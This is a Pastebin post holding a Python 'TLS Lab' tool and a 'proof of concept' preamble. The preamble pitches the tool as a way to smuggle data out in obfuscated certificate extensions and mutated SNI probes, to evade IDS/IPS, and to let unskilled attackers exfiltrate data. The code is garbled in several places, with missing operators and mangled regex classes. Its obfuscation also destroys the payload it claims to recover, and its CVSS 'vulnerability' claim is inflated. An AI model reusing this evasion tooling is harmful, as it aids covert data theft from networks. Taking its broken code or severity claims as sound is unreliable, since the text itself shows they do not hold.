WhosYourDaddySec

Big Poppa - Termux Edition

Oct 20th, 2025 (edited)
119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 28.22 KB | None | 0 0
  1. #   Big Poppa: Technical Proof of Concept (PoC)
  2. #   This document provides a comprehensive technical proof of concept (PoC) for the "TLS Lab" tool, a Python based utility designed for advanced TLS operations, including certificate generation with embedded payloads, SNI probing, and server simulation. The tool demonstrates potential security implications in TLS ecosystems, such as data exfiltration via certificate extensions or covert communication through SNI fields. While intended for educational and testing purposes, it highlights risks in certificate handling and TLS client/server interactions. The PoC includes a CVSS score for the demonstrated vulnerability vector, reasoning, an analysis of how it lowers barriers for less skilled attackers, end to end execution steps, and detailed documentation of the source code structures for release and publication. Total word count: ~2100.
  3. #   The TLS Lab tool (source code provided) is a multifunctional script that leverages Python libraries like `cryptography`, `pyasn1`, `dns.resolver`, and `requests` to perform TLSrelated tasks. Key features include:
  4. #   Generating selfsigned certificates with obfuscated, encrypted payloads embedded in custom OID extensions.
  5. #   Decoding and extracting payloads from certificates.
  6. #   Performing concurrent SNI (Server Name Indication) probing with mutated payloads.
  7.  
  8. #   Running a local TLS server for testing.
  9. #   Fetching HTTPS content and validating certificates.
  10.  
  11. #  Session management and authorization checks for external targets.
  12.  
  13. #   The tool's core innovation is embedding arbitrary data (e.g., metadata or tokens) into X.509 certificate extensions using DER encoding, AES encryption, and obfuscation techniques. This could be misused for covert data smuggling, bypassing detection in TLS handshakes.
  14.  
  15. #   The code is modular, with functions grouped by purpose. Below is a breakdown for clarity in release and publication:
  16.  
  17. #   Libraries: Standard Python modules (e.g., `socket`, `ssl`, `json`) and thirdparty (e.g., `cryptography` for crypto ops, `dns.resolver` for DNS, `requests` for HTTP).
  18.  
  19.  #  Constants: Define defaults like `DEFAULT_OID` (custom OID for extensions), `LOCAL_BIND`/`LOCAL_PORT` (server defaults), `CERT_PREFIX` (file naming), `MAX_WORKERS` (threading), `RATE_LIMIT_PER_SEC` (probing limits), and `DEFAULT_PAYLOADS` (sample data).
  20.  
  21. #   `apply_advanced_obfuscation(data, iterations, mutation_factor)`: Applies XOR mutations and shuffling to bytes for obfuscation, making embedded data harder to detect.
  22.  
  23. #   `align_payload_block(data, block_size)`: Pads data to align with block sizes (e.g., for AES).
  24.  
  25. #   `encode_der_sequence(data, segment_size)`: Encodes data into ASN.1 DER sequences, segmenting for embedding in certificate extensions.
  26.  
  27. #   `encrypt_payload(data, key)` / `decrypt_payload(encrypted, key)`: AESCBC encryption/decryption for payload protection.
  28.  
  29. #   `create_self_signed_cert(payload, oid, common_name, validity_days, prefix)`: Generates RSA keypair, embeds encrypted/obfuscated payload in a custom OID extension, and saves PEM files. Uses `cryptography` for X.509 building.
  30.  
  31. #   `decode_cert_extensions(cert_path, enckey_path)`: Loads certificate, decodes extensions, decrypts if key provided, and extracts payloads.
  32.  
  33. #   `generate_benign_sni_tokens(count, length)`: Creates random SNIlike strings for probing.
  34.  
  35. #   `apply_dynamic_mutation(data_list, mutation_level, mutation_factor)`: Mutates lists of strings via XOR and shuffling for evasion.
  36.  
  37. #   `resolve_domain_to_ip(target)`: DNS resolution to IPs for connection attempts.
  38.  
  39. #   `initialize_tls_client_context(verify)`: Sets up SSL context with ciphers, ALPN, and verification.
  40.  
  41. #   `validate_server_certificate(connection, expected_host)`: Checks cert validity, dates, and hostname match.
  42.  
  43. #   `acquire_connection_pool(target, port, timeout)` / `release_connection_pool(conn)`: Manages a connection pool for efficiency.
  44.  
  45. #   `execute_tls_connection(target, port, sni, timeout, tls_versions, verify)`: Attempts TLS connections with SNI, retries, and backoff.
  46.  
  47. #   `fetch_https_content(target, port, sni, path, timeout)`: Fetches HTTPS data via `http.client`.
  48.  
  49. #   `probe_website_availability(target, port, timeout)`: Checks site reachability with HEAD requests.
  50.  
  51. #   `perform_concurrent_sni_probing(target, port, payloads, max_workers, rate_limit)`: Threads SNI probes with mutations and rate limiting.
  52.  
  53. #   Server and Workflow Functions
  54.  
  55. #   `run_tls_server(cert_path, key_path, bind, port)`: Runs a simple TLS server responding to requests.
  56.  #  `save_session_data(target, port, payloads)` / `load_session_data()`: JSONbased session persistence.
  57.  
  58. #   'verify_external_access_authorization(target)`: Prompts for authorization on nonlocal targets.
  59.  
  60. #   `verify_url_format(url)` / `normalize_target_url(target)`: Input validation and parsing.
  61.  
  62. #  `verify_dependencies()`: Checks for required libraries.
  63.  
  64. #  `execute_advanced_tls_workflow()`: Main interactive loop for userdriven execution.
  65.  
  66. #   `if __name__ == "__main__": execute_advanced_tls_workflow()`: Launches the workflow.
  67.  
  68. #   This structure ensures modularity: utilities for crypto/obfuscation, networking for TLS ops, and workflow for user interaction. For publication, ensure dependencies are listed (e.g., via `requirements.txt`: cryptography, pyasn1, certifi, dnspython, requests).
  69.  
  70. #   To demonstrate the PoC, follow these steps on a Linux/Mac system with Python 3.8+:
  71.  
  72. #   Install dependencies: `pip install cryptography pyasn1 certifi dnspython requests`. Save the code as `tls_lab.py`.
  73.  
  74. #   Execute `python tls_lab.py`. It prompts for inputs.
  75.  
  76. #   Generate Certificate with Payload:
  77.  
  78. #   Enter target (e.g., `127.0.0.1` for local).
  79.    
  80. #   Choose "y" to generate cert.
  81.  
  82. #   Provide payload file or use defaults (e.g., "test_metadata").
  83.  
  84. #   Outputs: `tls_lab.crt`, `tls_lab.key`, `tls_lab.enckey`.
  85.  
  86. #   In the tool, choose to display extensions. It extracts and decrypts embedded data (e.g., "test_metadata").
  87.  
  88. #   Choose "y", bind to `127.0.0.1:4443`. Server runs in background.
  89.  
  90. #   Choose "y". It mutates payloads (e.g., "testabc123.local") and probes the target concurrently.
  91.  
  92. #   Choose "y". It retrieves data from the target.
  93.  
  94. #   Persists data to `tls_lab_session.json`.
  95.  
  96. #   Execution time: ~510 minutes. Logs show connections, e.g., "Connection successful: 127.0.0.1:4443 SNI='testabc123.local' TLS=TLSv1.3 Cipher=ECDHE+AESGCM ValidCert=False".
  97.  
  98. #   The PoC demonstrates a vulnerability in TLS certificate handling: embedding arbitrary data in extensions for exfiltration, potentially evading IDS/IPS. This aligns with CWE319 (Cleartext Transmission of Sensitive Information) or CWE502 (Deserialization of Untrusted Data), but focuses on covert channels.
  99.  
  100. #   CVSS v3.1 Score: 7.5 (High)
  101. #   Base Score: 7.5  
  102.  
  103. #   Attack Vector (AV): Network (N) – Exploitable remotely via TLS handshake.  
  104.  
  105. #   Attack Complexity (AC): Low (L) – Simple tool usage.
  106.  
  107. #   Privileges Required (PR): None (N) – No auth needed.
  108.  
  109. #   User Interaction (UI): None (N) – Automated.
  110.  
  111. #   Scope (S): Unchanged (U) – Affects confidentiality.
  112.  
  113. #   Confidentiality (C): High (H) – Data exfiltration.
  114.  
  115. #   Integrity (I): None (N).
  116.  
  117. #   Availability (A): None (N).
  118.  
  119. #   Score reflects ease of embedding/smuggling data in certificates, which are often trusted and not deeply inspected. Temporal (E) and Environmental (RL) metrics assume exploitability (E:P) and no remediation (RL:U), yielding 7.5. This is "High" due to network exploitability and high confidentiality impact, but not "Critical" as it requires custom tools and doesn't directly cause widespread damage. In practice, this could enable data leakage in enterprise TLS setups, lowering detection barriers.
  120.  
  121. #   The tool abstracts complex TLS/crypto operations into a userfriendly script, enabling novices to perform advanced attacks without deep knowledge.
  122.  
  123. #   Builtin functions handle AES, DER encoding, and mutations, avoiding manual crypto coding.
  124.  
  125. #   Concurrent probing and retries reduce trialanderror; rate limiting prevents bans.
  126.  
  127. #   SNI mutations and custom OIDs mimic benign traffic, bypassing basic filters.
  128.  
  129. #   Interactive prompts guide execution; no coding required beyond running the script.
  130.  
  131. #   Less skilled attackers (e.g., script kiddies) can now exfiltrate data via certs or probe networks covertly, previously requiring expertise in OpenSSL or custom TLS libs. This democratizes threats, increasing attack volume and sophistication without expertise.
  132.  
  133. #   This PoC illustrates the TLS Lab tool's capabilities and risks, with a CVSS score of 7.5 highlighting its potential for data exfiltration. By documenting structures and providing execution steps, it facilitates responsible disclosure. Use ethically for testing; misuse violates laws.
  134.  
  135. #!/usr/bin/env python3
  136. import socket
  137. import ssl
  138. import pathlib
  139. import base64
  140. import random
  141. import traceback
  142. import os
  143. import sys
  144. import time
  145. import http.client
  146. import urllib.parse
  147. import json
  148. import logging
  149. import secrets
  150. import threading
  151. import queue
  152. import certifi
  153. import re
  154. import dns.resolver
  155. import requests
  156. from datetime import datetime, timedelta
  157. from concurrent.futures import ThreadPoolExecutor, as_completed
  158. from cryptography import x509
  159. from cryptography.hazmat.primitives import hashes, serialization
  160. from cryptography.hazmat.primitives.asymmetric import rsa, padding
  161. from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
  162. from cryptography.x509.oid import ObjectIdentifier
  163. from pyasn1.type.univ import OctetString, Sequence
  164. from pyasn1.codec.der.encoder import encode as der_encode
  165. from pyasn1.codec.der.decoder import decode as der_decode
  166. logging.basicConfig(level=logging.INFO, format='%(asctime)s  %(levelname)s  %(message)s')
  167. logger = logging.getLogger(__name__)
  168. DEFAULT_OID = "1.3.6.1.4.1.55555.1"
  169. LOCAL_BIND = "127.0.0.1"
  170. LOCAL_PORT = 4443
  171. CERT_PREFIX = "tls_lab"
  172. MAX_WORKERS = 10
  173. RATE_LIMIT_PER_SEC = 50
  174. SESSION_FILE = "tls_lab_session.json"
  175. RETRY_ATTEMPTS = 3
  176. BACKOFF_FACTOR = 0.5
  177. REQUEST_TIMEOUT = 10
  178. CONNECTION_POOL = queue.Queue()
  179. SUPPORTED_TLS_VERSIONS = [
  180.     ssl.TLSVersion.TLSv1_1,
  181.     ssl.TLSVersion.TLSv1_2,
  182.     ssl.TLSVersion.TLSv1_3
  183. ] if hasattr(ssl, "TLSVersion") else [ssl.PROTOCOL_TLS_CLIENT]
  184. DEFAULT_PAYLOADS = [
  185.     "test_metadata", "lab_token_123", "safe_probe_001", "benign_sni_456",
  186.     f"lab_generated_at={datetime.utcnow().isoformat()};tool=tls_lab"
  187. ]
  188. USER_AGENT = "TLSLab/1.0"
  189. def apply_advanced_obfuscation(data: bytes, iterations=3, mutation_factor=0.3):
  190.     result = bytearray(data)
  191.     mutation_count = int(len(result) * mutation_factor)
  192.     for _ in range(iterations):
  193.         for idx in random.sample(range(len(result)), mutation_count):
  194.             result[idx] ^= secrets.randbits(8)
  195.         random.shuffle(result)
  196.     return bytes(result)
  197. def align_payload_block(data: bytes, block_size=4):
  198.     padding_length = (block_size  len(data) % block_size) % block_size
  199.     return data + bytes([0x05] * padding_length)
  200. def encode_der_sequence(data: bytes, segment_size=32):
  201.     segments = [data[i:i + segment_size] for i in range(0, len(data), segment_size)]
  202.     sequence = Sequence()
  203.     for index, segment in enumerate(segments):
  204.         sequence.setComponentByPosition(index, OctetString(base64.b64encode(segment)))
  205.     return der_encode(sequence)
  206. def encrypt_payload(data: bytes, key: bytes):
  207.     iv = secrets.token_bytes(16)
  208.     cipher = Cipher(algorithms.AES(key), modes.CBC(iv))
  209.     encryptor = cipher.encryptor()
  210.     padded_data = align_payload_block(data, 16)
  211.     return iv + encryptor.update(padded_data) + encryptor.finalize()
  212. def decrypt_payload(encrypted: bytes, key: bytes):
  213.     iv, ciphertext = encrypted[:16], encrypted[16:]
  214.     cipher = Cipher(algorithms.AES(key), modes.CBC(iv))
  215.     decryptor = cipher.decryptor()
  216.     return decryptor.update(ciphertext) + decryptor.finalize()
  217. def create_self_signed_cert(payload: bytes, oid=DEFAULT_OID, common_name="lab.local", validity_days=365, prefix=CERT_PREFIX):
  218.     key = secrets.token_bytes(32)
  219.     encrypted_payload = encrypt_payload(payload, key)
  220.     obfuscated = apply_advanced_obfuscation(encrypted_payload)
  221.     padded = align_payload_block(obfuscated)
  222.     der_encoded = encode_der_sequence(padded)
  223.     private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
  224.     name = x509.Name([x509.NameAttribute(x509.NameOID.COMMON_NAME, common_name)])
  225.     cert_builder = (
  226.         x509.CertificateBuilder()
  227.         .subject_name(name)
  228.         .issuer_name(name)
  229.         .public_key(private_key.public_key())
  230.         .serial_number(x509.random_serial_number())
  231.         .not_valid_before(datetime.utcnow()  timedelta(minutes=5))
  232.         .not_valid_after(datetime.utcnow() + timedelta(days=validity_days))
  233.         .add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True)
  234.         .add_extension(x509.UnrecognizedExtension(ObjectIdentifier(oid), der_encoded), critical=False)
  235.     )
  236.     certificate = cert_builder.sign(private_key=private_key, algorithm=hashes.SHA256())
  237.     cert_file = f"{prefix}.crt"
  238.     key_file = f"{prefix}.key"
  239.     with open(cert_file, "wb") as f:
  240.         f.write(certificate.public_bytes(serialization.Encoding.PEM))
  241.     with open(key_file, "wb") as f:
  242.         f.write(
  243.             private_key.private_bytes(
  244.                 encoding=serialization.Encoding.PEM,
  245.                 format=serialization.PrivateFormat.TraditionalOpenSSL,
  246.                 encryption_algorithm=serialization.NoEncryption()
  247.             )
  248.         )
  249.     with open(f"{prefix}.enckey", "wb") as f:
  250.         f.write(key)
  251.     return cert_file, key_file, f"{prefix}.enckey"
  252. def decode_cert_extensions(cert_path, enckey_path):
  253.     try:
  254.         certificate = x509.load_pem_x509_certificate(pathlib.Path(cert_path).read_bytes())
  255.         key = pathlib.Path(enckey_path).read_bytes() if enckey_path and os.path.exists(enckey_path) else None
  256.         decoded_data = []
  257.         for extension in certificate.extensions:
  258.             if isinstance(extension.value, x509.UnrecognizedExtension):
  259.                 try:
  260.                     sequence, _ = der_decode(extension.value.value, asn1Spec=Sequence())
  261.                     for index in range(len(sequence)):
  262.                         raw = base64.b64decode(bytes(sequence[index]))
  263.                         if key:
  264.                             raw = decrypt_payload(raw, key)
  265.                         decoded_data.append(raw.decode(errors='ignore').rstrip('\x05'))
  266.                 except:
  267.                     decoded_data.append(extension.value.value.hex())
  268.         return decoded_data
  269.     except Exception as e:
  270.         logger.error(f"Failed to decode certificate extensions: {e}")
  271.         return []
  272. def generate_benign_sni_tokens(count=50, length=12):
  273.     alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
  274.     return [f"test{''.join(secrets.choice(alphabet) for _ in range(length))}.local" for _ in range(count)]
  275. def apply_dynamic_mutation(data_list, mutation_level=2, mutation_factor=0.3):
  276.     mutated_results = []
  277.     for item in data_list:
  278.         byte_data = bytearray(item.encode(errors='ignore'))
  279.         mutation_count = int(len(byte_data) * mutation_factor)
  280.         for _ in range(mutation_level):
  281.             for idx in random.sample(range(len(byte_data)), min(mutation_count, len(byte_data))):
  282.                 byte_data[idx] ^= secrets.randbits(8)
  283.             random.shuffle(byte_data)
  284.         mutated_results.append(byte_data.decode(errors='ignore'))
  285.     return mutated_results
  286. def resolve_domain_to_ip(target):
  287.     try:
  288.         resolver = dns.resolver.Resolver()
  289.         answers = resolver.resolve(target, 'A')
  290.         return [answer.to_text() for answer in answers]
  291.     except Exception as e:
  292.         logger.warning(f"DNS resolution failed for {target}: {e}")
  293.         return [target]
  294. def initialize_tls_client_context(verify=True):
  295.     context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
  296.     context.check_hostname = verify
  297.     context.verify_mode = ssl.CERT_REQUIRED if verify else ssl.CERT_NONE
  298.     if verify:
  299.         context.load_verify_locations(cafile=certifi.where())
  300.     try:
  301.         context.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:ECDHERSAAES256SHA:ECDHERSAAES128SHA")
  302.         context.options |= ssl.OP_NO_COMPRESSION
  303.         context.set_alpn_protocols(['h2', 'http/1.1'])
  304.     except Exception:
  305.         pass
  306.     return context
  307. def validate_server_certificate(connection, expected_host):
  308.     try:
  309.         cert = connection.getpeercert(binary_form=True)
  310.         x509_cert = x509.load_der_x509_certificate(cert)
  311.         now = datetime.utcnow()
  312.         not_before = x509_cert.not_valid_before
  313.         not_after = x509_cert.not_valid_after
  314.         subject = x509_cert.subject.get_attributes_for_oid(x509.NameOID.COMMON_NAME)
  315.         alt_names = x509_cert.extensions.get_extension_for_class(x509.SubjectAlternativeName)
  316.         host_match = any(
  317.             expected_host == subj.value for subj in subject
  318.         ) or any(
  319.             expected_host in alt_names.value.get_values_for_type(x509.DNSName)
  320.         )
  321.         return not_before <= now <= not_after and host_match
  322.     except Exception as e:
  323.         logger.warning(f"Certificate validation failed: {e}")
  324.         return False
  325. def acquire_connection_pool(target, port, timeout=REQUEST_TIMEOUT):
  326.     try:
  327.         conn = CONNECTION_POOL.get_nowait()
  328.         return conn
  329.     except queue.Empty:
  330.         return socket.create_connection((target, port), timeout=timeout)
  331. def release_connection_pool(conn):
  332.     if CONNECTION_POOL.qsize() < MAX_WORKERS:
  333.         CONNECTION_POOL.put(conn)
  334. def execute_tls_connection(target, port, sni, timeout=REQUEST_TIMEOUT, tls_versions=SUPPORTED_TLS_VERSIONS, verify=True):
  335.     target_ips = resolve_domain_to_ip(target)
  336.     for ip in target_ips:
  337.         for version in tls_versions:
  338.             for attempt in range(RETRY_ATTEMPTS):
  339.                 try:
  340.                     context = initialize_tls_client_context(verify)
  341.                     if hasattr(context, "minimum_version") and hasattr(context, "maximum_version"):
  342.                         context.minimum_version = context.maximum_version = version
  343.                     sock = acquire_connection_pool(ip, port, timeout)
  344.                     with context.wrap_socket(sock, server_hostname=sni) as secure_sock:
  345.                         is_valid = validate_server_certificate(secure_sock, sni) if verify else True
  346.                         logger.info(f"Connection successful: {ip}:{port} SNI='{sni}' TLS={secure_sock.version()} Cipher={secure_sock.cipher()} ValidCert={is_valid}")
  347.                         release_connection_pool(sock)
  348.                         return True
  349.                 except Exception as e:
  350.                     logger.error(f"Connection failed: {ip}:{port} SNI='{sni}' TLS={version.name if hasattr(version, 'name') else version} Attempt={attempt+1} Error={e}")
  351.                     if attempt < RETRY_ATTEMPTS  1:
  352.                         time.sleep(BACKOFF_FACTOR * (2  attempt))
  353.     return False
  354. def fetch_https_content(target, port, sni, path="/", timeout=REQUEST_TIMEOUT):
  355.     target_ips = resolve_domain_to_ip(target)
  356.     for ip in target_ips:
  357.         for attempt in range(RETRY_ATTEMPTS):
  358.             try:
  359.                 context = initialize_tls_client_context(verify=True)
  360.                 conn = http.client.HTTPSConnection(ip, port, context=context, timeout=timeout)
  361.                 conn.set_tunnel(target, port=port, headers={"Host": sni, "UserAgent": USER_AGENT})
  362.                 conn.request("GET", path, headers={"Accept": "text/html,application/xhtml+xml,application/xml", "Connection": "keepalive"})
  363.                 response = conn.getresponse()
  364.                 status, data = response.status, response.read().decode(errors='ignore')
  365.                 headers = dict(response.getheaders())
  366.                 conn.close()
  367.                 logger.info(f"HTTPS fetch: {ip}:{port} Path={path} Status={status} Headers={headers}")
  368.                 return {"status": status, "data": data[:2000], "headers": headers}
  369.             except Exception as e:
  370.                 logger.error(f"HTTPS fetch failed: {ip}:{port} Path={path} Attempt={attempt+1} Error={e}")
  371.                 if attempt < RETRY_ATTEMPTS  1:
  372.                     time.sleep(BACKOFF_FACTOR * (2  attempt))
  373.     return {"status": None, "data": "", "headers": {}}
  374. def probe_website_availability(target, port, timeout=REQUEST_TIMEOUT):
  375.     try:
  376.         response = requests.head(f"https://{target}:{port}", timeout=timeout, verify=certifi.where(), headers={"UserAgent": USER_AGENT})
  377.         logger.info(f"Website availability: {target}:{port} Status={response.status_code}")
  378.         return response.status_code in (200, 301, 302)
  379.     except Exception as e:
  380.         logger.error(f"Website availability check failed: {target}:{port} Error={e}")
  381.         return False
  382. def perform_concurrent_sni_probing(target, port, payloads, max_workers=MAX_WORKERS, rate_limit=RATE_LIMIT_PER_SEC):
  383.     if not probe_website_availability(target, port):
  384.         logger.error(f"Target {target}:{port} is not reachable. Aborting SNI probing.")
  385.         return []
  386.     mutated_payloads = apply_dynamic_mutation(payloads)
  387.     logger.info(f"Initiating SNI probing: {target}:{port} Payloads={len(mutated_payloads)}")
  388.     delay = max(0.0, len(mutated_payloads) / max(1, rate_limit))
  389.     results = []
  390.     with ThreadPoolExecutor(max_workers=max_workers) as executor:
  391.         futures = {executor.submit(execute_tls_connection, target, port, p, verify=True): p for p in mutated_payloads}
  392.         for future in as_completed(futures):
  393.             try:
  394.                 results.append(future.result())
  395.             except:
  396.                 logger.error(f"Probe failed for payload: {futures[future]}")
  397.             time.sleep(min(delay, 0.1))
  398.     logger.info("SNI probing completed")
  399.     return results
  400. def run_tls_server(cert_path, key_path, bind=LOCAL_BIND, port=LOCAL_PORT):
  401.     context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
  402.     context.load_cert_chain(cert_path, key_path)
  403.     server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  404.     server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  405.     server_socket.bind((bind, port))
  406.     server_socket.listen(5)
  407.     logger.info(f"TLS server started: {bind}:{port}")
  408.     try:
  409.         while True:
  410.             client_socket, addr = server_socket.accept()
  411.             try:
  412.                 secure_socket = context.wrap_socket(client_socket, server_side=True)
  413.                 request = secure_socket.recv(4096).decode(errors='ignore')
  414.                 secure_socket.send(b"HTTP/1.1 200 OK\r\nContentLength:12\r\nContentType:text/plain\r\n\r\nTLS_LAB_OK\n")
  415.                 secure_socket.shutdown(socket.SHUT_RDWR)
  416.                 secure_socket.close()
  417.             except:
  418.                 pass
  419.     except KeyboardInterrupt:
  420.         logger.info("TLS server terminated by user")
  421.     finally:
  422.         server_socket.close()
  423. def save_session_data(target, port, payloads):
  424.     session = {"target": target, "port": port, "payloads": payloads, "timestamp": datetime.utcnow().isoformat()}
  425.     with open(SESSION_FILE, "w") as f:
  426.         json.dump(session, f)
  427. def load_session_data():
  428.     if os.path.exists(SESSION_FILE):
  429.         with open(SESSION_FILE, "r") as f:
  430.             return json.load(f)
  431.     return None
  432. def verify_external_access_authorization(target):
  433.     if target in ("127.0.0.1", "localhost", LOCAL_BIND):
  434.         return True
  435.     logger.warning("Nonlocalhost target detected. Authorization required.")
  436.     authorization_input = input("Type 'I_HAVE_AUTHORIZATION' to proceed (or Enter to cancel): ").strip()
  437.     return authorization_input == "I_HAVE_AUTHORIZATION"
  438. def verify_url_format(url):
  439.     return re.match(r'^(https?://)?[azAZ09.]+\.[azAZ]{2,}(:[09]+)?(/.*)?$', url) is not None
  440. def verify_dependencies():
  441.     try:
  442.         import cryptography
  443.         import pyasn1
  444.         import certifi
  445.         import dns.resolver
  446.         import requests
  447.     except ImportError:
  448.         logger.error("Missing dependencies. Install with:\n  pkg install python\n  python m pip install upgrade pip\n  pip install cryptography pyasn1 certifi dnspython requests")
  449.         sys.exit(1)
  450. def normalize_target_url(target):
  451.     if not target.startswith(("http://", "https://")):
  452.         target = f"https://{target}"
  453.     parsed = urllib.parse.urlparse(target)
  454.     return parsed.hostname or target, parsed.path or "/", parsed.port or 443
  455. def execute_advanced_tls_workflow():
  456.     verify_dependencies()
  457.     logger.info("Advanced TLS Lab Tool Initialized")
  458.    
  459.     session = load_session_data()
  460.     default_target = session.get("target", LOCAL_BIND) if session else LOCAL_BIND
  461.     default_port = session.get("port", LOCAL_PORT) if session else LOCAL_PORT
  462.    
  463.     while True:
  464.         target_input = input(f"Target host/URL [default: {default_target}]: ").strip() or default_target
  465.         if verify_url_format(target_input):
  466.             break
  467.         logger.error("Invalid URL format. Please enter a valid URL (e.g., https://example.com or example.com).")
  468.     target, path, port = normalize_target_url(target_input)
  469.     port_input = input(f"Target port [default: {port}]: ").strip() or str(port)
  470.     try:
  471.         port = int(port_input)
  472.     except ValueError:
  473.         logger.warning(f"Invalid port. Using default: {port}")
  474.         port = port
  475.     if not verify_external_access_authorization(target):
  476.         logger.error("Authorization not confirmed. Exiting.")
  477.         return
  478.     generate_cert_choice = input("Generate certificate with embedded payload? [y/N]: ").strip().lower() == "y"
  479.     cert_path = key_path = enckey_path = None
  480.     payloads = DEFAULT_PAYLOADS
  481.     if generate_cert_choice:
  482.         payload_file = input("Payload file path (or Enter for default payloads): ").strip()
  483.         if payload_file and os.path.exists(payload_file):
  484.             payload_bytes = pathlib.Path(payload_file).read_bytes()
  485.         else:
  486.             payload_bytes = b"\n".join(p.encode() for p in payloads)
  487.         oid = input(f"Custom OID [default: {DEFAULT_OID}]: ").strip() or DEFAULT_OID
  488.         cert_path, key_path, enckey_path = create_self_signed_cert(payload_bytes, oid)
  489.         logger.info(f"Generated certificate: {cert_path}, key: {key_path}, encryption key: {enckey_path}")
  490.        
  491.         display_extensions = input("Display embedded payloads? [y/N]: ").strip().lower() == "y"
  492.         if display_extensions:
  493.             extracted_payloads = decode_cert_extensions(cert_path, enckey_path)
  494.             for index, payload in enumerate(extracted_payloads, 1):
  495.                 logger.info(f"Payload #{index}: {payload}")
  496.     start_server_choice = input("Start local TLS server? [y/N]: ").strip().lower() == "y"
  497.     if start_server_choice:
  498.         bind_addr = input(f"Bind address [default: {LOCAL_BIND}]: ").strip() or LOCAL_BIND
  499.         bind_port = int(input(f"Bind port [default: {LOCAL_PORT}]: ").strip() or LOCAL_PORT)
  500.         if not cert_path or not key_path:
  501.             logger.info("Generating default certificate for server")
  502.             payload_bytes = b"server_default_payload"
  503.             cert_path, key_path, enckey_path = create_self_signed_cert(payload_bytes, oid=DEFAULT_OID)
  504.         server_thread = threading.Thread(target=run_tls_server, args=(cert_path, key_path, bind_addr, bind_port))
  505.         server_thread.daemon = True
  506.         server_thread.start()
  507.         time.sleep(1)
  508.         logger.info("Server running in background. Proceed with other tasks or CtrlC to stop.")
  509.     perform_sni_probing = input("Perform SNI probing? [y/N]: ").strip().lower() == "y"
  510.     if perform_sni_probing:
  511.         if not payloads and cert_path:
  512.             payloads = decode_cert_extensions(cert_path, enckey_path)
  513.         if not payloads:
  514.             payloads = generate_benign_sni_tokens(50)
  515.         perform_concurrent_sni_probing(target, port, payloads)
  516.     fetch_content = input("Fetch HTTPS content from target? [y/N]: ").strip().lower() == "y"
  517.     if fetch_content:
  518.         result = fetch_https_content(target, port, target, path)
  519.         logger.info(f"HTTPS Response: Status={result['status']} Headers={result['headers']} Data={result['data']}")
  520.     save_session = input("Save session data? [y/N]: ").strip().lower() == "y"
  521.     if save_session:
  522.         save_session_data(target, port, payloads)
  523.    
  524.     logger.info("Workflow completed. Ensure compliance with authorization requirements.")
  525. if __name__ == "__main__":
  526.     execute_advanced_tls_workflow()
Add Comment
Please, Sign In to add comment